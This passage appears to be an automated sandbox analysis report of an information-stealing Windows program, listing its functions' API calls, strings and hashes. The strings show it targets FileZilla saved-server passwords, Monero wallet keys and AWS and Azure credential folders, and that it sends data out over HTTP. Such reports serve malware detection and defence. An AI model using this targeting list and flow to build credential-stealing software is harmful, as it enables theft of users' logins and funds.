                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                            • Part of subcall function 00E999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                            • Part of subcall function 00E999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                            • Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                            • Part of subcall function 00E999C0: LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                            • Part of subcall function 00E999C0: CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • GetProcessHeap.KERNEL32(00000000,000F423F,00EB0DBA,00EB0DB7,00EB0DB6,00EB0DB3), ref: 00EA0362
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA0369
                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EA0385
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0393
                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EA03CF
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA03DD
                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00EA0419
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0427
                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EA0463
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0475
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0502
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA051A
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA0532
                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA054A
                                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EA0562
                                          • lstrcat.KERNEL32(?,profile: null), ref: 00EA0571
                                          • lstrcat.KERNEL32(?,url: ), ref: 00EA0580
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA0593
                                          • lstrcat.KERNEL32(?,00EB1678), ref: 00EA05A2
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA05B5
                                          • lstrcat.KERNEL32(?,00EB167C), ref: 00EA05C4
                                          • lstrcat.KERNEL32(?,login: ), ref: 00EA05D3
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA05E6
                                          • lstrcat.KERNEL32(?,00EB1688), ref: 00EA05F5
                                          • lstrcat.KERNEL32(?,password: ), ref: 00EA0604
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA0617
                                          • lstrcat.KERNEL32(?,00EB1698), ref: 00EA0626
                                          • lstrcat.KERNEL32(?,00EB169C), ref: 00EA0635
                                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EB0DB2), ref: 00EA068E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                          • API String ID: 1942843190-555421843
                                          • Opcode ID: b96e9c9a5faa5821a6a8a2a053d71446763aa1bdb0f5ba352a265f7e9688cc1c
                                          • Instruction ID: 86e57e4e361fdc26bb1ba1daf7d97057e5dbc95bcb1bb627f4a1ae99749cbb5c
                                          • Opcode Fuzzy Hash: b96e9c9a5faa5821a6a8a2a053d71446763aa1bdb0f5ba352a265f7e9688cc1c
                                          • Instruction Fuzzy Hash: CFD11F71A002089BCB54EBE4DD5AEEE73B8AF59300F545468F502BB085DF39BA05CB61
                                          Function 00E95960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E959F8
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E95A13
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E95B93
                                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00BBFCC0,00000000,?,00BBEF50,00000000,?,00EB1A1C), ref: 00E95E71
                                          • lstrlen.KERNEL32(00000000), ref: 00E95E82
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E95E93
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E95E9A
                                          • lstrlen.KERNEL32(00000000), ref: 00E95EAF
                                          • lstrlen.KERNEL32(00000000), ref: 00E95ED8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E95EF1
                                          • lstrlen.KERNEL32(00000000,?,?), ref: 00E95F1B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E95F2F
                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E95F4C
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FB0
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FBD
                                          • HttpOpenRequestA.WININET(00000000,00BBFBD0,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E95BF8
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • InternetCloseHandle.WININET(00000000), ref: 00E95FC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 874700897-2180234286
                                          • Opcode ID: dfebd2abd3838bdff909eac58a02600febe61c1e78e62736d379a2304d5c7545
                                          • Instruction ID: f6e1bfbf4151693a9dab1b8ae97acc50f8736f7f695ef26e8fc12936fa46a986
                                          • Opcode Fuzzy Hash: dfebd2abd3838bdff909eac58a02600febe61c1e78e62736d379a2304d5c7545
                                          • Instruction Fuzzy Hash: 64124072920218ABCB59EBA0DC99FEE73B8BF59300F4451A9B10677091EF343A49CF51
                                          Function 00E9CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA8B60: GetSystemTime.KERNEL32(00EB0E1A,00BBEF20,00EB05AE,?,?,00E913F9,?,0000001A,00EB0E1A,00000000,?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EA8B86
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E9CF83
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E9D0C7
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E9D0CE
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D208
                                          • lstrcat.KERNEL32(?,00EB1478), ref: 00E9D217
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D22A
                                          • lstrcat.KERNEL32(?,00EB147C), ref: 00E9D239
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D24C
                                          • lstrcat.KERNEL32(?,00EB1480), ref: 00E9D25B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D26E
                                          • lstrcat.KERNEL32(?,00EB1484), ref: 00E9D27D
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D290
                                          • lstrcat.KERNEL32(?,00EB1488), ref: 00E9D29F
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D2B2
                                          • lstrcat.KERNEL32(?,00EB148C), ref: 00E9D2C1
                                          • lstrcat.KERNEL32(?,00000000), ref: 00E9D2D4
                                          • lstrcat.KERNEL32(?,00EB1490), ref: 00E9D2E3
                                            • Part of subcall function 00EAA820: lstrlen.KERNEL32(00E94F05,?,?,00E94F05,00EB0DDE), ref: 00EAA82B
                                            • Part of subcall function 00EAA820: lstrcpy.KERNEL32(00EB0DDE,00000000), ref: 00EAA885
                                          • lstrlen.KERNEL32(?), ref: 00E9D32A
                                          • lstrlen.KERNEL32(?), ref: 00E9D339
                                            • Part of subcall function 00EAAA70: StrCmpCA.SHLWAPI(00BB8B58,00E9A7A7,?,00E9A7A7,00BB8B58), ref: 00EAAA8F
                                          • DeleteFileA.KERNEL32(00000000), ref: 00E9D3B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                          • String ID:
                                          • API String ID: 1956182324-0
                                          • Opcode ID: 62c7983da421d13cfa5a208e91c82bd627ece744bdd5207b73cbd4b6003487b6
                                          • Instruction ID: 6c830e9d6a9985e249e0b2e52e4ca6fc7a98a01fc9685541bad77c861fc55851
                                          • Opcode Fuzzy Hash: 62c7983da421d13cfa5a208e91c82bd627ece744bdd5207b73cbd4b6003487b6
                                          • Instruction Fuzzy Hash: 7BE11F72910204EBCB58EBA0DD96EEE73B8AF59301F145168F507BB091DF39BA05CB61
                                          Function 00E9C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00BBDEC8,00000000,?,00EB144C,00000000,?,?), ref: 00E9CA6C
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E9CA89
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00E9CA95
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E9CAA8
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E9CAD9
                                          • StrStrA.SHLWAPI(?,00BBDF10,00EB0B52), ref: 00E9CAF7
                                          • StrStrA.SHLWAPI(00000000,00BBDE08), ref: 00E9CB1E
                                          • StrStrA.SHLWAPI(?,00BBE4E8,00000000,?,00EB1458,00000000,?,00000000,00000000,?,00BB8AD8,00000000,?,00EB1454,00000000,?), ref: 00E9CCA2
                                          • StrStrA.SHLWAPI(00000000,00BBE648), ref: 00E9CCB9
                                            • Part of subcall function 00E9C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E9C871
                                            • Part of subcall function 00E9C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E9C87C
                                          • StrStrA.SHLWAPI(?,00BBE648,00000000,?,00EB145C,00000000,?,00000000,00BB8B18), ref: 00E9CD5A
                                          • StrStrA.SHLWAPI(00000000,00BB88A8), ref: 00E9CD71
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B46), ref: 00E9C943
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B47), ref: 00E9C957
                                            • Part of subcall function 00E9C820: lstrcat.KERNEL32(?,00EB0B4E), ref: 00E9C978
                                          • lstrlen.KERNEL32(00000000), ref: 00E9CE44
                                          • CloseHandle.KERNEL32(00000000), ref: 00E9CE9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                          • String ID:
                                          • API String ID: 3744635739-3916222277
                                          • Opcode ID: 70f6d5cfe53ab015d184f8a60b7d619dcfab6458f22f8bf1a25962cdaa8c68cd
                                          • Instruction ID: cfa663511143aae0db7ec8e37ce39eb503b77e1555b960cb145fd3661109f589
                                          • Opcode Fuzzy Hash: 70f6d5cfe53ab015d184f8a60b7d619dcfab6458f22f8bf1a25962cdaa8c68cd
                                          • Instruction Fuzzy Hash: 6BE14F72900208ABCB58EBA0DC95FEEB7B8AF59300F455169F5077B091DF347A4ACB61
                                          Function 00EA8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • RegOpenKeyExA.ADVAPI32(00000000,00BBBC50,00000000,00020019,00000000,00EB05B6), ref: 00EA83A4
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EA8426
                                          • wsprintfA.USER32 ref: 00EA8459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EA847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8499
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3246050789-3278919252
                                          • Opcode ID: 32b64345bb0c1fd5161e67200d2cd75752a3c8b1f9705c9f797cae6016abbb78
                                          • Instruction ID: 139cbea33df696cff62d513b12b65c5b63234133c1e499baf8e614dfc433f7e1
                                          • Opcode Fuzzy Hash: 32b64345bb0c1fd5161e67200d2cd75752a3c8b1f9705c9f797cae6016abbb78
                                          • Instruction Fuzzy Hash: 48811C71911218DBEB68DF50CD95FEA77B8BF48700F009299E50AAA140DF757B85CF90
                                          Function 00EA4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4DB0
                                          • lstrcat.KERNEL32(?,\.azure\), ref: 00EA4DCD
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA492C
                                            • Part of subcall function 00EA4910: FindFirstFileA.KERNEL32(?,?), ref: 00EA4943
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4E3C
                                          • lstrcat.KERNEL32(?,\.aws\), ref: 00EA4E59
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FDC), ref: 00EA4971
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB0FE0), ref: 00EA4987
                                            • Part of subcall function 00EA4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EA4B7D
                                            • Part of subcall function 00EA4910: FindClose.KERNEL32(000000FF), ref: 00EA4B92
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4EC8
                                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00EA4EE5
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA49B0
                                            • Part of subcall function 00EA4910: StrCmpCA.SHLWAPI(?,00EB08D2), ref: 00EA49C5
                                            • Part of subcall function 00EA4910: wsprintfA.USER32 ref: 00EA49E2
                                            • Part of subcall function 00EA4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00EA4A1E
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00BBFBA0), ref: 00EA4A4A
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00EB0FF8), ref: 00EA4A5C
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,?), ref: 00EA4A70
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,00EB0FFC), ref: 00EA4A82
                                            • Part of subcall function 00EA4910: lstrcat.KERNEL32(?,?), ref: 00EA4A96
                                            • Part of subcall function 00EA4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00EA4AAC
                                            • Part of subcall function 00EA4910: DeleteFileA.KERNEL32(?), ref: 00EA4B31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
